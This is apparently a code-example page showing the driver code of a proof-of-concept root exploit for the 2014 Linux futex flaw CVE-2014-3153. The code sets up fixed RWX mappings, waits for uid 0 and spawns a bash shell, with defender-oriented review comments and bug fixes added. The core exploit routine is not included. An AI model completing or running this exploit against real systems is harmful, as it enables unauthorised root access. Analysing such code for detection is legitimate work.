예제 #1
/*
 * Entry point of a local privilege-escalation proof of concept. The banner
 * names CVE-2014-3153, a Linux kernel futex flaw that was fixed upstream in
 * 2014; patched kernels are the mitigation.
 *
 * Flow visible in this function:
 *   - record the caller's thread id in main_pid, then fork;
 *   - the child stages two fixed-address RWX mappings, starts a helper
 *     thread and a local server, and calls do_exploit();
 *   - the parent polls getuid() until it reports 0 and then execs a shell.
 *
 * main_pid, iov_base0/iov_len0, iov_basex/iov_lenx, sockfd,
 * thread_client_to_setup_rt_waiter, MMAP_ADDR_BASE, MMAP_LEN and the helper
 * functions are not declared in this block; they come from elsewhere in the
 * file.
 *
 * Defender view: the observable behaviour here is fixed-address
 * PROT_READ|PROT_WRITE|PROT_EXEC shared anonymous mappings, followed by a
 * process whose real uid becomes 0 with no exec of a setuid binary in
 * between, followed by an interactive shell.
 *
 * Returns 1 from the child on any setup failure, 0 otherwise.
 */
int main(int argc, char *argv[])
{
	unsigned long mapped_address; /* never used in this function */
	void *waiter_plist;
	
	printf("CVE-2014-3153 exploit by Chen Kaiqu([email protected])\n");
  
	/* Saved before fork() so the value refers to the parent.
	 * Presumably read by do_exploit() to locate the parent task; confirm
	 * against its definition. */
	main_pid = gettid();
	if(fork() == 0) {
		/* Child: 64 KiB region pinned at 0xb0000000 with MAP_FIXED. */
		iov_base0 = (unsigned long)mmap((void *)0xb0000000, 0x10000, PROT_READ | PROT_WRITE | PROT_EXEC, /*MAP_POPULATE |*/ MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);
		/* NOTE(review): mmap() reports failure as MAP_FAILED, i.e. (void *)-1.
		 * Cast to unsigned long that is the largest value, so it is never
		 * below the base and this test does not catch a failed call. */
		if (iov_base0 < 0xb0000000) {
			printf("mmap failed?\n");
			return 1;
		}
		iov_len0 = 0x10000;
		
		/* Second fixed mapping; address and length are macros defined
		 * outside this block. */
		iov_basex = (unsigned long)mmap((void *)MMAP_ADDR_BASE, MMAP_LEN, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);
		/* NOTE(review): same MAP_FAILED blind spot as the check above. */
		if (iov_basex < MMAP_ADDR_BASE) {
			printf("mmap failed?\n");
			return 1;
		}
		iov_lenx = MMAP_LEN;
		
		/* Pointer 0x400 bytes into the second mapping. Arithmetic on
		 * void * is a GNU extension, not standard C. */
		waiter_plist = (void *)iov_basex + 0x400;
		/* NOTE(review): the pthread_create() result is not checked. */
		pthread_create(&thread_client_to_setup_rt_waiter, NULL, client_to_setup_rt_waiter, waiter_plist);
		
		/* A negative return is treated as failure. */
		sockfd = server_for_setup_rt_waiter();
		if (sockfd < 0) {
			printf("Server failed\n");
			return 1;
		}
		
		/* do_exploit() is defined elsewhere; a zero return is treated
		 * as failure. */
		if (!do_exploit(waiter_plist)) {
			return 1;
		}
		return 0;
	}

	/* Parent: poll every 100 microseconds until getuid() returns 0.
	 * There is no timeout and the child is never reaped, so the loop spins
	 * forever if the uid never changes. */
	while(getuid())
		usleep(100);
	/* NOTE(review): argv[0] is passed as "bin/bash" without the leading
	 * slash, and the variadic terminator should be (char *)NULL. */
	execl("/bin/bash", "bin/bash", NULL);
	return 0;
}
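/*
 * Reduced harness: creates one fixed-address RWX shared anonymous mapping,
 * derives a pointer 0x800 bytes into it, and runs
 * server_for_setup_rt_waiter() (defined elsewhere in the file).
 *
 * Two defects in the original are corrected:
 *   - the server result was tested with `ret = -1`, an assignment that is
 *     always true, so the program returned 1 even on success;
 *   - the mmap() result was compared with 0x80000000, which cannot detect
 *     MAP_FAILED ((void *)-1 is above that value once cast to unsigned long).
 *
 * Defender view: a fixed-address PROT_READ|PROT_WRITE|PROT_EXEC mapping is
 * the observable behaviour of this function.
 *
 * Returns 0 on success, 1 if the mapping or the server setup fails.
 */
int
main(void)
{
    int ret;
    void *mapping;
    void *waiter_plist;

    mapping = mmap((void *)0xa0000000, 0x110000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);
    if (mapping == MAP_FAILED) {
        printf("mmap failed?\n");
        return 1;
    }

    /* Computed but not used further in this function. The char * cast
     * avoids relying on GNU void * arithmetic. */
    waiter_plist = (char *)mapping + 0x800;
    (void)waiter_plist;

    /* A negative return is treated as failure, matching the check the other
     * main() in this listing applies to the same helper. */
    ret = server_for_setup_rt_waiter();
    if (ret < 0) {
        return 1;
    }

    return 0;
}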